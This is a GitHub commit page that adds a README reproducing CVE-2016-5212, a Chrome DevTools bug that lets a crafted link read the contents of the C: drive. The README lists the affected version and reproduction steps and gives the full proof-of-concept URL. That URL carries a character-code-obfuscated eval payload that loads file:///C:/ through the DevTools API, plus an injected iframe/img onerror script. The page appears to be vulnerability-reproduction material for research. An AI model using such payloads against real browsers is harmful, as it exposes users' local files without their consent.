Skip to content

Commit b8412f6

Browse files
MetnewMetnew
committed
feat(chrome-2016-5212): chrome-devtools:// read C:/ drive
1 parent 79eacd5 commit b8412f6

File tree

1 file changed

+17
-0
lines changed

1 file changed

+17
-0
lines changed

chrome/CVE-2016-5212/README.md

+17
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
# Security: chrome-devtools protocol allows to read the content of C:\ drive
2+
3+
> Reported by [email protected], Oct 5 2016
4+
5+
## VERSION
6+
7+
Chrome Version: 55.0.2880.4 canary (64-bit)
8+
Operating System: Windows 7
9+
10+
## REPRODUCTION CASE
11+
12+
1. Navigate to the link below.
13+
2. As you can see the page displays the content of C:\ drive.
14+
15+
PoC: chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html?eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,32,123,10,99,61,39,100,61,34,34,44,68,101,118,84,111,111,108,115,65,80,73,46,115,116,114,101,97,109,87,114,105,116,101,61,102,117,110,99,116,105,111,110,40,101,44,111,41,123,100,43,61,111,125,44,68,101,118,84,111,111,108,115,65,80,73,46,115,101,110,100,77,101,115,115,97,103,101,84,111,69,109,98,101,100,100,101,114,40,34,108,111,97,100,78,101,116,119,111,114,107,82,101,115,111,117,114,99,101,34,44,91,34,102,105,108,101,58,47,47,47,67,58,47,34,44,34,34,44,48,93,44,102,117,110,99,116,105,111,110,40,101,41,123,100,46,115,112,108,105,116,40,34,92,92,110,34,41,46,109,97,112,40,102,117,110,99,116,105,111,110,40,101,41,123,101,46,109,97,116,99,104,40,47,97,100,100,82,111,119,46,42,59,47,41,38,38,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,101,46,109,97,116,99,104,40,47,97,100,100,82,111,119,46,42,59,47,41,91,48,93,41,59,125,41,125,41,59,39,32,59,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,62,119,105,110,100,111,119,46,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,62,39,43,99,43,39,60,47,115,99,114,39,43,39,105,112,116,62,39,41,59,60,47,115,99,114,34,43,34,105,112,116,62,34,41,59,10,125,10,105,102,40,32,116,121,112,101,111,102,32,68,101,118,84,111,111,108,115,72,111,115,116,32,61,61,32,34,117,110,100,101,102,105,110,101,100,34,32,41,32,10,108,111,99,97,116,105,111,110,46,114,101,108,111,97,100,40,41,59,10,101,108,115,101,10,102,40,41,59)):0);a=0;&remoteFrontendUrl=https://chrome-devtools-frontend.appspot.com/%27%3E%3C/iframe%3E%3Cimg%20src=x%20onerror=%27javascript:eval(1
16+
17+
Link: https://bugs.chromium.org/p/chromium/issues/detail?id=653134

0 commit comments

Comments
 (0)